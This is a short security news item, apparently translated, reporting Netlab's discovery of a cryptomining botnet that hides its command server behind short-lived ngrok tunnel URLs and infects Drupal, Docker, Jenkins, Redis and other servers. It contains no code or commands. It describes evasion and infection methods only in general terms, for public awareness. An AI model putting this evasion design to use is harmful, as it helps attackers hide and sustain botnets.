Found a botnet hiding behind a constantly changing address

The new botnet uses ngrok.com to connect bots to the C & C server.

A team of Netlab researchers from the Chinese company Qihoo 360discoveredan unusual botnet used for the crypto currency. Its main difference from other botnets is that the bots connect to the remote server not directly, but through the service ngrok.com.

The ngrok site is a simple reverse proxy server that allows users to connect to servers located behind firewalls or on local machines without a public IP address. Service is very popular with the corporate sector, since with its help employees can connect to the internal networks of their companies. In addition, it is used by independent developers to show customers the applications they develop.

Typically, a user deploys the server to their local computer, registers with the ngrok.com site, and receives a public URL in the form [random_string] .ngrok.io. This link, for example, the developer can provide his customer for a preview of the project being developed.

Netlab researchers discovered a botnet, whose C & C server is located behind the network of ngrok proxy servers. Among other things, the C & C server got good protection against attempts to disable it. This is possible due to the fact that ngrok URLs remain online only for 12 hours, so by the time the security experts discover the URL of the C & C server, it will already change. Thus, the botnet is more tenacious than its “colleagues” with C & C-servers on popular hosting platforms.

Botnet consists of four main components: the Scanner module for searching for vulnerable applications, Reporter, responsible for establishing a connection between the client and the server, Loader for downloading and infecting the host and Miner for minimizing crypto currency due to the resources of the infected server. There is also a module for finding Ethereum wallets, however it is not active. Another component introduces the Coinhive crypto currency miner into all active JavaScript files on the server, which means that the botnet also runs Monero through the visitors of the sites located on the infected server.

Currently, malware infects such applications and content management systems as Drupal, ModX, Docker, Jenkins, Redis and CouchDB.

Leave a Reply